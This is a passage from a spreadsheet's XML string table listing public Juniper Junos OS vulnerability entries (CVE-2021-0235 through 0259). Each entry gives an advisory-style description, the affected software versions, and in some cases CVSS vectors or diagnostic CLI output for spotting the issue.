    <t>CVE-2021-0235</t>
  </si>
  <si>
    <t>On SRX1500, SRX4100, SRX4200, SRX4600, SRX5000 Series with SPC2/SPC3, vSRX Series devices using tenant services on Juniper Networks Junos OS, due to incorrect permission scheme assigned to tenant system administrators, a tenant system administrator may inadvertently send their network traffic to one or more tenants while concurrently modifying the overall device system traffic management, affecting all tenants and the service provider. Further, a tenant may inadvertently receive traffic from another tenant. This issue affects: Juniper Networks Junos OS 18.3 version 18.3R1 and later versions on SRX1500, SRX4100, SRX4200, SRX4600, SRX5000 Series with SPC2; 18.4 version 18.4R1 and later versions on SRX1500, SRX4100, SRX4200, SRX4600, SRX5000 Series with SPC2/SPC3; 19.1 versions 19.1R1 and later versions on SRX1500, SRX4100, SRX4200, SRX4600, SRX5000 Series with SPC2/SPC3; 19.2 versions prior to 19.2R1-S6, 19.2R3-S2 on SRX1500, SRX4100, SRX4200, SRX4600, SRX5000 Series with SPC2/SPC3; 19.3 versions prior to 19.3R3-S2 on SRX1500, SRX4100, SRX4200, SRX4600, SRX5000 Series with SPC2/SPC3; 19.4 versions prior to 19.4R2-S4, 19.4R3-S2 on SRX1500, SRX4100, SRX4200, SRX4600, SRX5000 Series with SPC2/SPC3; 20.1 versions prior to 20.1R2, 20.1R3 on SRX1500, SRX4100, SRX4200, SRX4600, SRX5000 Series with SPC2/SPC3 vSRX Series; 20.2 versions prior to 20.2R2-S1, 20.2R3 on SRX1500, SRX4100, SRX4200, SRX4600, SRX5000 Series with SPC2/SPC3 vSRX Series; 20.3 versions prior to 20.3R1-S2, 20.3R2 on SRX1500, SRX4100, SRX4200, SRX4600, SRX5000 Series with SPC2/SPC3 vSRX Series; 20.4 versions prior to 20.4R1, 20.4R2 on SRX1500, SRX4100, SRX4200, SRX4600, SRX5000 Series with SPC2/SPC3 vSRX Series. This issue does not affect Juniper Networks Junos OS versions prior to 18.3R1.</t>
  </si>
  <si>
    <t>CVE-2021-0236</t>
  </si>
  <si>
    <t>Due to an improper check for unusual or exceptional conditions in Juniper Networks Junos OS and Junos OS Evolved the Routing Protocol Daemon (RPD) service, upon receipt of a specific matching BGP packet meeting a specific term in the flowspec configuration, crashes and restarts causing a Denial of Service (DoS). Continued receipt and processing of this packet will create a sustained Denial of Service (DoS) condition. This issue affects only Multiprotocol BGP (MP-BGP) VPNv6 FlowSpec deployments. This issue affects: Juniper Networks Junos OS: 18.4 versions prior to 18.4R1-S8, 18.4R2-S7, 18.4R3-S7; 19.1 versions prior to 19.1R2-S2, 19.1R3-S4; 19.2 versions prior to 19.2R1-S6, 19.2R3-S2; 19.3 versions prior to 19.3R3-S2; 19.4 versions prior to 19.4R2-S4, 19.4R3-S1; 20.1 versions prior to 20.1R2, 20.1R3; 20.2 versions prior to 20.2R2, 20.2R3; 20.3 versions prior to 20.3R1-S1, 20.3R2. Juniper Networks Junos OS Evolved: All versions after 18.4R1-EVO prior to 20.3R2-EVO. This issue does not affect: Juniper Networks Junos OS versions prior to 18.4R1. Juniper Networks Junos OS Evolved versions prior to 18.4R1-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-0237</t>
  </si>
  <si>
    <t>On Juniper Networks EX4300-MP Series, EX4600 Series, EX4650 Series, QFX5K Series deployed as a Virtual Chassis with a specific Layer 2 circuit configuration, Packet Forwarding Engine manager (FXPC) process may crash and restart upon receipt of specific layer 2 frames. Continued receipt and processing of this packet will create a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS on EX4300-MP Series, EX4600 Series, EX4650 Series, QFX5K Series 15.1 versions prior to 15.1R7-S9; 17.3 versions prior to 17.3R3-S11; 17.4 versions prior to 17.4R2-S13, 17.4R3-S4, 17.4R3-S5; 18.2 versions prior to 18.2R3-S8; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R2-S7, 18.4R3-S6; 19.1 versions prior to 19.1R3-S4; 19.2 versions prior to 19.2R1-S6, 19.2R3-S1; 19.3 versions prior to 19.3R3-S1; 19.4 versions prior to 19.4R2-S4, 19.4R3-S1; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R2, 20.2R3; 20.3 versions prior to 20.3R1-S2, 20.3R2;</t>
  </si>
  <si>
    <t>CVE-2021-0238</t>
  </si>
  <si>
    <t>When a MX Series is configured as a Broadband Network Gateway (BNG) based on Layer 2 Tunneling Protocol (L2TP), executing certain CLI command may cause the system to run out of disk space, excessive disk usage may cause other complications. An administrator can use the following CLI command to monitor the available disk space: user@device&gt; show system storage Filesystem Size Used Avail Capacity Mounted on /dev/gpt/junos 19G 18G 147M 99% /.mount &lt;&lt;&lt;&lt;&lt; running out of space tmpfs 21G 16K 21G 0% /.mount/tmp tmpfs 5.3G 1.7M 5.3G 0% /.mount/mfs This issue affects Juniper Networks Junos OS on MX Series: 17.3R1 and later versions prior to 17.4R3-S5, 18.1 versions prior to 18.1R3-S13, 18.2 versions prior to 18.2R3-S7; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R3-S7; 19.1 versions prior to 19.1R3-S4; 19.2 versions prior to 19.2R1-S6, 19.2R3-S2; 19.3 versions prior to 19.3R3-S2; 19.4 versions prior to 19.4R2-S4, 19.4R3-S2; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R2-S3, 20.2R3; 20.3 versions prior to 20.3R2; 20.4 versions prior to 20.4R1-S1, 20.4R2; This issue does not affect Juniper Networks Junos OS versions prior to 17.3R1.</t>
  </si>
  <si>
    <t>CVE-2021-0239</t>
  </si>
  <si>
    <t>In Juniper Networks Junos OS Evolved, receipt of a stream of specific genuine Layer 2 frames may cause the Advanced Forwarding Toolkit (AFT) manager process (Evo-aftmand), responsible for handling Route, Class-of-Service (CoS), Firewall operations within the packet forwarding engine (PFE) to crash and restart, leading to a Denial of Service (DoS) condition. By continuously sending this specific stream of genuine Layer 2 frames, an attacker can repeatedly crash the PFE, causing a sustained Denial of Service (DoS). This issue affects Juniper Networks Junos OS Evolved: All versions prior to 20.4R1-EVO. This issue does not affect Junos OS versions.</t>
  </si>
  <si>
    <t>CVE-2021-0240</t>
  </si>
  <si>
    <t>On Juniper Networks Junos OS platforms configured as DHCPv6 local server or DHCPv6 Relay Agent, the Juniper Networks Dynamic Host Configuration Protocol Daemon (JDHCPD) process might crash if a malformed DHCPv6 packet is received, resulting in a restart of the daemon. The daemon automatically restarts without intervention, but continued receipt and processing of this packet will create a sustained Denial of Service (DoS) condition. This issue only affects DHCPv6. DHCPv4 is not affected by this issue. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S12; 17.4 versions prior to 17.4R3-S5; 18.1 versions prior to 18.1R3-S13; 18.2 versions prior to 18.2R3-S8; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R1-S8, 18.4R3-S7; 19.1 versions prior to 19.1R3-S5; 19.2 versions prior to 19.2R3-S2; 19.3 versions prior to 19.3R3-S2; 19.4 versions prior to 19.4R3-S2; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R2-S3, 20.2R3; 20.3 versions prior to 20.3R2; 20.4 versions prior to 20.4R2.</t>
  </si>
  <si>
    <t>CVE-2021-0241</t>
  </si>
  <si>
    <t>On Juniper Networks Junos OS platforms configured as DHCPv6 local server or DHCPv6 Relay Agent, Juniper Networks Dynamic Host Configuration Protocol Daemon (JDHCPD) process might crash with a core dump if a specific DHCPv6 packet is received, resulting in a restart of the daemon. The daemon automatically restarts without intervention, but continued receipt and processing of these specific packets will repeatedly crash the JDHCPD process and sustain the Denial of Service (DoS) condition. This issue only affects DHCPv6. DHCPv4 is not affected by this issue. This issue affects: Juniper Networks Junos OS 17.3 versions prior to 17.3R3-S11; 17.4 versions prior to 17.4R3-S4; 18.1 versions prior to 18.1R3-S12; 18.2 versions prior to 18.2R3-S7; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R3-S7; 19.1 versions prior to 19.1R3-S4; 19.2 versions prior to 19.2R3-S1; 19.3 versions prior to 19.3R3-S1, 19.3R3-S2; 19.4 versions prior to 19.4R3-S1; 20.1 versions prior to 20.1R2, 20.1R3; 20.2 versions prior to 20.2R2, 20.2R3; 20.3 versions prior to 20.3R1-S2, 20.3R2.</t>
  </si>
  <si>
    <t>CVE-2021-0242</t>
  </si>
  <si>
    <t>A vulnerability due to the improper handling of direct memory access (DMA) buffers on EX4300 switches on Juniper Networks Junos OS allows an attacker sending specific unicast frames to trigger a Denial of Service (DoS) condition by exhausting DMA buffers, causing the FPC to crash and the device to restart. The DMA buffer leak is seen when receiving these specific, valid unicast frames on an interface without Layer 2 Protocol Tunneling (L2PT) or dot1x configured. Interfaces with either L2PT or dot1x configured are not vulnerable to this issue. When this issue occurs, DMA buffer usage keeps increasing and the following error log messages may be observed: Apr 14 14:29:34.360 /kernel: pid 64476 (pfex_junos), uid 0: exited on signal 11 (core dumped) Apr 14 14:29:33.790 init: pfe-manager (PID 64476) terminated by signal number 11. Core dumped! The DMA buffers on the FPC can be monitored by the executing vty command 'show heap': ID Base Total(b) Free(b) Used(b) % Name -- ---------- ----------- ----------- ----------- --- ----------- 0 4a46000 268435456 238230496 30204960 11 Kernel 1 18a46000 67108864 17618536 49490328 73 Bcm_sdk 2 23737000 117440512 18414552 99025960 84 DMA buf &lt;&lt;&lt;&lt;&lt; keeps increasing 3 2a737000 16777216 16777216 0 0 DMA desc This issue affects Juniper Networks Junos OS on the EX4300: 17.3 versions prior to 17.3R3-S11; 17.4 versions prior to 17.4R2-S13, 17.4R3-S4; 18.1 versions prior to 18.1R3-S12; 18.2 versions prior to 18.2R2-S8, 18.2R3-S7; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R1-S8, 18.4R2-S7, 18.4R3-S7; 19.1 versions prior to 19.1R1-S6, 19.1R2-S2, 19.1R3-S4; 19.2 versions prior to 19.2R1-S6, 19.2R3-S2; 19.3 versions prior to 19.3R3-S2; 19.4 versions prior to 19.4R2-S3, 19.4R3-S1; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R2-S1, 20.2R3; 20.3 versions prior to 20.3R1-S1, 20.3R2.</t>
  </si>
  <si>
    <t>CVE-2021-0243</t>
  </si>
  <si>
    <t>Improper Handling of Unexpected Data in the firewall policer of Juniper Networks Junos OS on EX4300 switches allows matching traffic to exceed set policer limits, possibly leading to a limited Denial of Service (DoS) condition. When the firewall policer discard action fails on a Layer 2 port, it will allow traffic to pass even though it exceeds set policer limits. Traffic will not get discarded, and will be forwarded even though a policer discard action is configured. When the issue occurs, traffic is not discarded as desired, which can be observed by comparing the Input bytes with the Output bytes using the following command: user@junos&gt; monitor interface traffic Interface Link Input bytes (bps) Output bytes (bps) ge-0/0/0 Up 37425422 (82616) 37425354 (82616) &lt;&lt;&lt;&lt; egress ge-0/0/1 Up 37425898 (82616) 37425354 (82616) &lt;&lt;&lt;&lt; ingress The expected output, with input and output counters differing, is shown below: Interface Link Input bytes (bps) Output bytes (bps) ge-0/0/0 Up 342420570 (54600) 342422760 (54600) &lt;&lt;&lt;&lt; egress ge-0/0/1 Up 517672120 (84000) 342420570 (54600) &lt;&lt;&lt;&lt; ingress This issue only affects IPv4 policing. IPv6 traffic and firewall policing actions are not affected by this issue. This issue affects Juniper Networks Junos OS on the EX4300: All versions prior to 17.3R3-S10; 17.4 versions prior to 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R3-S6; 19.1 versions prior to 19.1R3-S3; 19.2 versions prior to 19.2R3-S1; 19.3 versions prior to 19.3R3-S1; 19.4 versions prior to 19.4R3; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R2.</t>
  </si>
  <si>
    <t>CVE-2021-0244</t>
  </si>
  <si>
    <t>A signal handler race condition exists in the Layer 2 Address Learning Daemon (L2ALD) of Juniper Networks Junos OS due to the absence of a specific protection mechanism to avoid a race condition which may allow an attacker to bypass the storm-control feature on devices. This issue is a corner case and only occurs during specific actions taken by an administrator of a device under certain specifics actions which triggers the event. The event occurs less frequently on devices which are not configured with Virtual Chassis configurations, and more frequently on devices configured in Virtual Chassis configurations. This issue is not specific to any particular Junos OS platform. An Indicator of Compromise (IoC) may be seen by reviewing log files for the following error message seen by executing the following show statement: show log messages | grep storm Result to look for: /kernel: GENCFG: op 58 (Storm Control Blob) failed; err 1 (Unknown) This issue affects: Juniper Networks Junos OS: 14.1X53 versions prior to 14.1X53-D49 on EX Series; 15.1 versions prior to 15.1R7-S6; 15.1X49 versions prior to 15.1X49-D191, 15.1X49-D200 on SRX Series; 16.1 versions prior to 16.1R7-S7; 16.2 versions prior to 16.2R2-S11, 16.2R3; 17.1 versions prior to 17.1R2-S11, 17.1R3; 17.2 versions prior to 17.2R2-S8, 17.2R3-S3; 17.3 versions prior to 17.3R2-S5, 17.3R3-S7; 17.4 versions prior to 17.4R2-S9, 17.4R3; 18.1 versions prior to 18.1R3-S5; 18.2 versions prior to 18.2R2-S6, 18.2R3; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3; 18.4 versions prior to 18.4R1-S5, 18.4R2; 19.1 versions prior to 19.1R1-S4, 19.1R2.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:H</t>
  </si>
  <si>
    <t>CVE-2021-0245</t>
  </si>
  <si>
    <t>A Use of Hard-coded Credentials vulnerability in Juniper Networks Junos OS on Junos Fusion satellite devices allows an attacker who is local to the device to elevate their privileges and take control of the device. This issue affects: Juniper Networks Junos OS Junos Fusion Satellite Devices. 16.1 versions prior to 16.1R7-S7; 17.1 versions prior to 17.1R2-S12, 17.1R3-S2; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S10; 17.4 version 17.4R3 and later versions; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R2-S7, 18.2R3-S3; 18.3 versions prior to 18.3R1-S7, 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R1-S6, 18.4R2-S4, 18.4R3-S1; 19.1 versions prior to 19.1R1-S5, 19.1R2-S1, 19.1R3; 19.2 versions prior to 19.2R1-S4, 19.2R2; 19.3 versions prior to 19.3R2-S5, 19.3R3; 19.4 versions prior to 19.4R1-S1, 19.4R2; 20.1 versions prior to 20.1R1-S1, 20.1R2. This issue does not affected Junos OS releases prior to 16.1R1 or all 19.2R3 and 19.4R3 release versions.</t>
  </si>
  <si>
    <t>CVE-2021-0246</t>
  </si>
  <si>
    <t>On SRX1500, SRX4100, SRX4200, SRX4600, SRX5000 Series with SPC2/SPC3, devices using tenant services on Juniper Networks Junos OS, due to incorrect default permissions assigned to tenant system administrators a tenant system administrator may inadvertently send their network traffic to one or more tenants while concurrently modifying the overall device system traffic management, affecting all tenants and the service provider. Further, a tenant may inadvertently receive traffic from another tenant. This issue affects: Juniper Networks Junos OS 18.3 version 18.3R1 and later versions on SRX1500, SRX4100, SRX4200, SRX4600, SRX5000 Series with SPC2; 18.3 versions prior to 18.3R3 on SRX1500, SRX4100, SRX4200, SRX4600, SRX5000 Series with SPC2; 18.4 versions prior to 18.4R2 on SRX1500, SRX4100, SRX4200, SRX4600, SRX5000 Series with SPC2/SPC3; 19.1 versions prior to 19.1R2 on SRX1500, SRX4100, SRX4200, SRX4600, SRX5000 Series with SPC2/SPC3. This issue does not affect: Juniper Networks Junos OS versions prior to 18.3R1.</t>
  </si>
  <si>
    <t>CVE-2021-0247</t>
  </si>
  <si>
    <t>A Race Condition (Concurrent Execution using Shared Resource with Improper Synchronization) vulnerability in the firewall process (dfwd) of Juniper Networks Junos OS allows an attacker to bypass the firewall rule sets applied to the input loopback filter on any interfaces of a device. This issue is detectable by reviewing the PFE firewall rules, as well as the firewall counters and seeing if they are incrementing or not. For example: show firewall Filter: __default_bpdu_filter__ Filter: FILTER-INET-01 Counters: Name Bytes Packets output-match-inet 0 0 &lt;&lt;&lt;&lt;&lt;&lt; missing firewall packet count This issue affects: Juniper Networks Junos OS 14.1X53 versions prior to 14.1X53-D53 on QFX Series; 14.1 versions 14.1R1 and later versions prior to 15.1 versions prior to 15.1R7-S6 on QFX Series, PTX Series; 15.1X53 versions prior to 15.1X53-D593 on QFX Series; 16.1 versions prior to 16.1R7-S7 on QFX Series, PTX Series; 16.2 versions prior to 16.2R2-S11, 16.2R3 on QFX Series, PTX Series; 17.1 versions prior to 17.1R2-S11, 17.1R3-S2 on QFX Series, PTX Series; 17.2 versions prior to 17.2R1-S9, 17.2R3-S3 on QFX Series, PTX Series; 17.3 versions prior to 17.3R2-S5, 17.3R3-S7 on QFX Series, PTX Series; 17.4 versions prior to 17.4R2-S9, 17.4R3 on QFX Series, PTX Series; 18.1 versions prior to 18.1R3-S9 on QFX Series, PTX Series; 18.2 versions prior to 18.2R2-S6, 18.2R3-S3 on QFX Series, PTX Series; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3-S1 on QFX Series, PTX Series; 18.4 versions prior to 18.4R1-S5, 18.4R2-S3, 18.4R2-S7, 18.4R3 on QFX Series, PTX Series; 19.1 versions prior to 19.1R1-S4, 19.1R2-S1, 19.1R3 on QFX Series, PTX Series; 19.2 versions prior to 19.2R1-S3, 19.2R2 on QFX Series, PTX Series.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2021-0248</t>
  </si>
  <si>
    <t>This issue is not applicable to NFX NextGen Software. On NFX Series devices the use of Hard-coded Credentials in Juniper Networks Junos OS allows an attacker to take over any instance of an NFX deployment. This issue is only exploitable through administrative interfaces. This issue affects: Juniper Networks Junos OS versions prior to 19.1R1 on NFX Series. No other platforms besides NFX Series devices are affected.</t>
  </si>
  <si>
    <t>CVE-2021-0249</t>
  </si>
  <si>
    <t>On SRX Series devices configured with UTM services a buffer overflow vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS may allow an attacker to arbitrarily execute code or commands on the target to take over or otherwise impact the device by sending crafted packets to or through the device. This issue affects: Juniper Networks Junos OS on SRX Series: 15.1X49 versions prior to 15.1X49-D190; 17.4 versions prior to 17.4R2-S9; 17.4R3 and later versions prior to 18.1R3-S9; 18.2 versions prior to 18.2R3-S1; 18.3 versions prior to 18.3R2-S3, 18.3R3; 18.4 versions prior to 18.4R2-S3, 18.4R3; 19.1 versions prior to 19.1R1-S4, 19.1R2; 19.2 versions prior to 19.2R1-S1, 19.2R2. An indicator of compromise can be the following text in the UTM log: RT_UTM: AV_FILE_NOT_SCANNED_PASSED_MT:</t>
  </si>
  <si>
    <t>CVE-2021-0250</t>
  </si>
  <si>
    <t>In segment routing traffic engineering (SRTE) environments where the BGP Monitoring Protocol (BMP) feature is enable, a vulnerability in the Routing Protocol Daemon (RPD) process of Juniper Networks Junos OS allows an attacker to send a specific crafted BGP update message causing the RPD service to core, creating a Denial of Service (DoS) Condition. Continued receipt and processing of this update message will create a sustained Denial of Service (DoS) condition. This issue affects IPv4 and IPv6 environments. This issue affects: Juniper Networks Junos OS 17.4 versions 17.4R1 and above prior to 17.4R2-S6, 17.4R3; 18.1 versions prior to 18.1R3-S7; 18.2 versions prior to 18.2R2-S6, 18.2R3-S3; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3; 18.4 versions prior to 18.4R1-S5, 18.4R2-S3, 18.4R3; 19.1 versions prior to 19.1R1-S4, 19.1R2; 19.2 versions prior to 19.2R1-S3, 19.2R2, This issue does not affect Junos OS releases prior to 17.4R1. This issue affects: Juniper Networks Junos OS Evolved 19.2-EVO versions prior to 19.2R2-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-0251</t>
  </si>
  <si>
    <t>A NULL Pointer Dereference vulnerability in the Captive Portal Content Delivery (CPCD) services daemon (cpcd) of Juniper Networks Junos OS on MX Series with MS-PIC, MS-SPC3, MS-MIC or MS-MPC allows an attacker to send malformed HTTP packets to the device thereby causing a Denial of Service (DoS), crashing the Multiservices PIC Management Daemon (mspmand) process thereby denying users the ability to login, while concurrently impacting other mspmand services and traffic through the device. Continued receipt and processing of these malformed packets will create a sustained Denial of Service (DoS) condition. While the Services PIC is restarting, all PIC services will be bypassed until the Services PIC completes its boot process. An attacker sending these malformed HTTP packets to the device who is not part of the Captive Portal experience is not able to exploit this issue. This issue is not applicable to MX RE-based CPCD platforms. This issue affects: Juniper Networks Junos OS on MX Series 17.3 version 17.3R1 and later versions prior to 17.4 versions 17.4R2-S9, 17.4R3-S2; 18.1 versions prior to 18.1R3-S9; 18.2 versions prior to 18.2R3-S3; 18.3 versions prior to 18.3R3-S1; 18.4 versions prior to 18.4R3; 19.1 versions prior to 19.1R2-S2, 19.1R3; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R3. This issue does not affect: Juniper Networks Junos OS versions prior to 17.3R1.</t>
  </si>
  <si>
    <t>CVE-2021-0252</t>
  </si>
  <si>
    <t>NFX Series devices using Juniper Networks Junos OS are susceptible to a local code execution vulnerability thereby allowing an attacker to elevate their privileges via the Junos Device Management Daemon (JDMD) process. This issue affects Juniper Networks Junos OS on NFX Series: 18.1 version 18.1R1 and later versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R1-S3, 19.1R2; 19.2 versions prior to 19.2R1-S5, 19.2R2. This issue does not affect: Juniper Networks Junos OS versions prior to 18.1R1. This issue does not affect the JDMD as used by Junos Node Slicing such as External Servers use in conjunction with Junos Node Slicing and In-Chassis Junos Node Slicing on MX480, MX960, MX2008, MX2010, MX2020.</t>
  </si>
  <si>
    <t>CVE-2021-0253</t>
  </si>
  <si>
    <t>NFX Series devices using Juniper Networks Junos OS are susceptible to a local command execution vulnerability thereby allowing an attacker to elevate their privileges via the Junos Device Management Daemon (JDMD) process. This issue affects Juniper Networks Junos OS on NFX Series 17.2 version 17.2R1 and later versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R2-S5, 18.4R3-S5; 19.1 versions prior to 19.1R1-S3; 19.2 version 19.1R2 and later versions prior to 19.2R3; 19.3 versions prior to 19.3R3; 19.4 versions prior to 19.4R2-S2. 19.4 versions 19.4R3 and above. This issue does not affect Juniper Networks Junos OS versions prior to 17.2R1. This issue does not affect the JDMD as used by Junos Node Slicing such as External Servers use in conjunction with Junos Node Slicing and In-Chassis Junos Node Slicing on MX480, MX960, MX2008, MX2010, MX2020.</t>
  </si>
  <si>
    <t>CVE-2021-0254</t>
  </si>
  <si>
    <t>A buffer size validation vulnerability in the overlayd service of Juniper Networks Junos OS may allow an unauthenticated remote attacker to send specially crafted packets to the device, triggering a partial Denial of Service (DoS) condition, or leading to remote code execution (RCE). Continued receipt and processing of these packets will sustain the partial DoS. The overlayd daemon handles Overlay OAM packets, such as ping and traceroute, sent to the overlay. The service runs as root by default and listens for UDP connections on port 4789. This issue results from improper buffer size validation, which can lead to a buffer overflow. Unauthenticated attackers can send specially crafted packets to trigger this vulnerability, resulting in possible remote code execution. overlayd runs by default in MX Series, ACX Series, and QFX Series platforms. The SRX Series does not support VXLAN and is therefore not vulnerable to this issue. Other platforms are also vulnerable if a Virtual Extensible LAN (VXLAN) overlay network is configured. This issue affects Juniper Networks Junos OS: 15.1 versions prior to 15.1R7-S9; 17.3 versions prior to 17.3R3-S11; 17.4 versions prior to 17.4R2-S13, 17.4R3-S4; 18.1 versions prior to 18.1R3-S12; 18.2 versions prior to 18.2R2-S8, 18.2R3-S7; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R1-S8, 18.4R2-S7, 18.4R3-S7; 19.1 versions prior to 19.1R2-S2, 19.1R3-S4; 19.2 versions prior to 19.2R1-S6, 19.2R3-S2; 19.3 versions prior to 19.3R3-S1; 19.4 versions prior to 19.4R2-S4, 19.4R3-S1; 20.1 versions prior to 20.1R2-S1, 20.1R3; 20.2 versions prior to 20.2R2, 20.2R2-S1, 20.2R3; 20.3 versions prior to 20.3R1-S1.</t>
  </si>
  <si>
    <t>CVE-2021-0255</t>
  </si>
  <si>
    <t>A local privilege escalation vulnerability in ethtraceroute of Juniper Networks Junos OS may allow a locally authenticated user with shell access to escalate privileges and write to the local filesystem as root. ethtraceroute is shipped with setuid permissions enabled and is owned by the root user, allowing local users to run ethtraceroute with root privileges. This issue affects Juniper Networks Junos OS: 15.1X49 versions prior to 15.1X49-D240; 17.3 versions prior to 17.3R3-S11, 17.4 versions prior to 17.4R3-S4; 18.1 versions prior to 18.1R3-S12; 18.2 versions prior to 18.2R3-S7; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R2-S7; 19.1 versions prior to 19.1R1-S6, 19.1R2-S2, 19.1R3-S4; 19.3 versions prior to 19.3R3-S2; 19.4 versions prior to 19.4R3-S1; 20.1 versions prior to 20.1R2, 20.1R3; 20.2 versions prior to 20.2R2-S1, 20.2R3; 20.3 versions prior to 20.3R1-S1.</t>
  </si>
  <si>
    <t>CVE-2021-0256</t>
  </si>
  <si>
    <t>A sensitive information disclosure vulnerability in the mosquitto message broker of Juniper Networks Junos OS may allow a locally authenticated user with shell access the ability to read portions of sensitive files, such as the master.passwd file. Since mosquitto is shipped with setuid permissions enabled and is owned by the root user, this vulnerability may allow a local privileged user the ability to run mosquitto with root privileges and access sensitive information stored on the local filesystem. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S12, 17.4 versions prior to 17.4R3-S4; 18.1 versions prior to 18.1R3-S12; 18.3 versions prior to 18.3R3-S4; 19.1 versions prior to 19.1R3-S4; 19.3 versions prior to 19.3R3-S1, 19.3R3-S2; 19.4 versions prior to 19.4R2-S3; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R1-S3, 20.2R2, 20.2R3.</t>
  </si>
  <si>
    <t>CVE-2021-0257</t>
  </si>
  <si>
    <t>On Juniper Networks MX Series and EX9200 Series platforms with Trio-based MPCs (Modular Port Concentrators) where Integrated Routing and Bridging (IRB) interfaces are configured and mapped to a VPLS instance or a Bridge-Domain, certain Layer 2 network events at Customer Edge (CE) devices may cause memory leaks in the MPC of Provider Edge (PE) devices which can cause an out of memory condition and MPC restart. When this issue occurs, there will be temporary traffic interruption until the MPC is restored. An administrator can use the following CLI command to monitor the status of memory usage level of the MPC: user@device&gt; show system resource-monitor fpc FPC Resource Usage Summary Free Heap Mem Watermark : 20 % Free NH Mem Watermark : 20 % Free Filter Mem Watermark : 20 % * - Watermark reached Slot # % Heap Free RTT Average RTT 1 87 PFE # % ENCAP mem Free % NH mem Free % FW mem Free 0 NA 88 99 1 NA 89 99 When the issue is occurring, the value of “% NH mem Free” will go down until the MPC restarts. This issue affects MX Series and EX9200 Series with Trio-based PFEs (Packet Forwarding Engines), including MX-MPC1-3D, MX-MPC1E-3D, MX-MPC2-3D, MX-MPC2E-3D, MPC-3D-16XGE, and CHAS-MXxx Series MPCs. No other products or platforms are affected by this issue. This issue affects Juniper Networks Junos OS on MX Series, EX9200 Series: 17.3 versions prior to 17.3R3-S10; 17.4 versions prior to 17.4R3-S3; 18.2 versions prior to 18.2R3-S7; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R3-S6; 19.2 versions prior to 19.2R3-S2; 19.3 versions prior to 19.3R3-S1; 19.4 versions prior to 19.4R2-S2, 19.4R3; 20.2 versions prior to 20.2R1-S3, 20.2R2; 20.3 versions prior to 20.3R1-S1,, 20.3R2. This issue does not affect Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R3-S2; 18.1; 18.2 versions prior to 18.2R3-S4; 18.3 versions prior to 18.3R3-S2; 18.4 versions prior to 18.4R3-S1; 19.1; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R3; 19.4 versions prior to 19.4R2.</t>
  </si>
  <si>
    <t>CVE-2021-0258</t>
  </si>
  <si>
    <t>A vulnerability in the forwarding of transit TCPv6 packets received on the Ethernet management interface of Juniper Networks Junos OS allows an attacker to trigger a kernel panic, leading to a Denial of Service (DoS). Continued receipt and processing of these transit packets will create a sustained Denial of Service (DoS) condition. This issue only occurs when TCPv6 packets are routed through the management interface. Other transit traffic, and traffic destined to the management interface, are unaffected by this vulnerability. This issue was introduced as part of a TCP Parallelization feature added in Junos OS 17.2, and affects systems with concurrent network stack enabled. This feature is enabled by default, but can be disabled (see WORKAROUND section below). This issue affects Juniper Networks Junos OS: 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2. This issue does not affect Juniper Networks Junos OS versions prior to 17.2R1.</t>
  </si>
  <si>
    <t>CVE-2021-0259</t>
  </si>
  <si>
